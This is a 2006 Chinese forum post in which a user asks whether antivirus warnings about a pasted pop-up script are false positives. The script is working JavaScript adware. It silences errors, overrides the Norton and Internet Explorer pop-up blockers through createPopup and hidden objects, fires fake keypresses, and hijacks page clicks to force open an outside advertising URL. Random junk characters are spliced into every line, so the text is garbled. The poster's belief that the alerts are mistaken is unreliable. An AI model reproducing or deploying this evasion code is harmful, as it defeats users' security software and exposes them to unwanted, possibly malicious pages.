各位幫我看看這段彈窗代碼,怎麼殺軟報毒,我覺得是誤報...
5 G4 T% ]. @& P; I
. [6 o' H; m u& z& a G4 V代碼如下.
) }* [( e3 Q8 O1 M8 ~3 ^, G1 F+ B% q- X: H; `$ F% u) S8 E5 p
" B1 ]) k/ ?- \* }; n<Script Language="JavaScript">( n) S# }9 }& Q# I: T9 E
var paypopupURL = "http://diaocha888.ik8.com/aonev.htm";. Q$ E, I( y+ j4 x2 a; z. Y
var usingActiveX = true;1 a) x) t5 Y8 }
function blockError(){return true;}! v/ y3 Y8 {: H/ d- D. p2 |
window.onerror = blockError;
7 ~5 K5 Y5 g% C4 E" R- a//bypass norton internet security popup blocker/ V; u- ]- j# I0 f% U: I' _1 B
if (window.SymRealWinOpen){window.open = SymRealWinOpen;}) A' S- N6 ?2 w
if (window.NS_ActualOpen) {window.open = NS_ActualOpen;}
: P. |4 P$ d3 s! n6 z9 e7 Mif (typeof(usingClick) == 'undefined') {var usingClick = false;}
$ d$ J- V% Z* k. G' _if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;}
5 C4 U5 p& A# z2 k/ x" o( wif (typeof(popwin) == 'undefined') {var popwin = null;}4 B, N1 l+ H9 q! B/ Q2 }" |* K
if (typeof(poped) == 'undefined') {var poped = false;}
2 c& W, c; V C4 g( _if (typeof(paypopupURL) == 'undefined') {var paypopupURL = "http://diaocha888.ik8.com/aonev.htm";}5 o- u+ |* q5 K) x0 \( x5 \
var blk = 1;$ P& m+ Q) V9 w/ y
var setupClickSuccess = false;0 x% T' ^& [& r! v* Q
var googleInUse = false;
9 c6 j. J2 W, k+ U: \0 Xvar myurl = location.href+'/';
1 O2 ~! O4 o$ N9 evar MAX_TRIED = 20;4 z6 Q) L1 \6 [+ t5 ~/ D$ E
var activeXTried = false;
8 P$ f, ^- E* @) C* Pvar tried = 0;
3 I% c$ [& O+ m9 n: w' Dvar randkey = '�0'; // random key from server. U( i2 j+ D0 A4 A
var myWindow;8 O8 q( b: I2 \7 R# t1 K6 b
var popWindow;
, A1 L) V% \1 V& L) T0 Avar setupActiveXSuccess = 0;
' H. J: {% n- C/ O+ c `' u// bypass IE functions* W8 z8 t8 b3 r* ]- s
function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('<INPUT STYLE="display:none;" ID="autoHit" TYPE="TEXT" ONKEYPRESS="showActiveX()">');popWindow=window.createPopup();popWindow.document.body.innerHTML='<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT></DIV>';document.write('<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;width:1px;height:1px;" SRC="about:blank"></IFRAME>');popIframe.document.write('<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT>');setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}}
! v+ H! l" N4 e) ~- Y, ?: cfunction tryActiveX(){if (!activeXTried && !poped) {if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow) {myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;}else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow){myWindow=popIframe.getParentFrame.object.parentWindow;popIframe.location.replace('about:blank');}else {setTimeout('tryActiveX()',200);tried++;if (tried >= MAX_TRIED && !activeXTried) {activeXTried = true;setupClick();}return;}openActiveX();window.windowFired=true;self.focus();}}% q' j5 V# b0 \* ^
function openActiveX(){if (!activeXTried && !poped) {if (myWindow && window.windowFired){window.windowFired=false;document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));}else {setTimeout('openActiveX();',100);}tried++;if (tried >= MAX_TRIED) {activeXTried = true;setupClick();}}}
( J' |# r2 l# Rfunction showActiveX(){if (!activeXTried && !poped) {if (googleInUse) {window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);}newWindow=myWindow.open(paypopupURL,'abcdefg');if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}}
0 p' p: M+ N+ P* R+ R// end bypass IE functions( Q% z7 S0 d/ { Y# j* J
// normal call functions0 L* r' }' X6 e9 M7 b$ _: V
function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {popwin = window.open(paypopupURL,'abcdefg');if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}}( {+ k8 j D9 R* Y# y! }! J: }
// end normal call functions
; s2 j2 E( E8 y' q0 C6 J5 Q" C* b/ S- ~// onclick call functions
5 P. A1 X9 k. ~" O/ A+ sfunction setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}
! N! X! b+ R# Xfunction gopop() {if (!poped) {popwin = window.open(paypopupURL,'abcdefg');if (popwin) {poped = true;}self.focus();}if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}}" t7 Q/ W2 i' o( [! u8 v9 A# {& X9 y
// end onclick call functions
- i% K5 x% M: D% S% G+ X0 |// check version
" T' Z2 A/ b& \( H2 Z. t' y" k3 |function detectGoogle() {if (usingActiveX) {try {document.write('<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e){setTimeout('detectGoogle();',50);}}}0 b8 y9 N$ g/ i* ~! E% } i+ _
function version() {var os = 'W0';var bs = 'I0';var isframe = false;var browser = window.navigator.userAgent;if (browser.indexOf('Win') != -1) {os = 'W1';}if (browser.indexOf("SV1") != -1) {bs = 'I2';}else if (browser.indexOf("Opera") != -1) {bs = "I0";}else if (browser.indexOf("Firefox") != -1) {bs = "I0";}else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}if (top.location != this.location) {isframe = true;}paypopupURL = paypopupURL;usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();}
4 K$ `# `4 l" A+ gversion();
% {" y: k% g. q( u, @3 x/ R. P// end check version
- k* J" T% J$ _" Hfunction loadingPop() {
Y7 y- D+ H9 _4 Kif(!usingClick && !usingActiveX) {! Y# Z" s, r/ P3 }. {
paypopup();7 {6 y' @% S8 o! Y2 W
}% `: Q9 g& ]) U# O
else if (usingActiveX) {tryActiveX();}
# X! t( F( N( B+ ?9 uelse {setupClick();}. \- {( f/ F5 o% m5 o/ O+ S
}; v* \! t- d" G3 y+ Y7 f% {
myurl = myurl.substring(0, myurl.indexOf('/',8));
, o. x% q4 |0 W* w8 K W: Bif (myurl == '') {myurl = '.';}/ m6 S" i! B5 d; e0 P% `
setupActiveX();, ^4 H- R3 g4 }# G2 o6 Y& Z# }$ c
loadingPop();
3 h, y/ [$ ^5 g) C2 r6 B1 oself.focus();# M8 k8 D! x9 y+ D- J, d3 N
</Script>
0 J# [( u+ P* y5 ^7 T
: p$ D1 k: g3 S5 n& K$ m& v
: P e6 K5 q2 f# f6 [. }# B( P9 z; {9 f4 p' q0 a. S
我的卡巴和ewido全報,說是downloader.xx.xx 什麼的,我看了下代碼,覺得是誤報,大家覺得呢! |
|
發表於 2006-7-28 18:10:52
提升卡
沉默卡
变色卡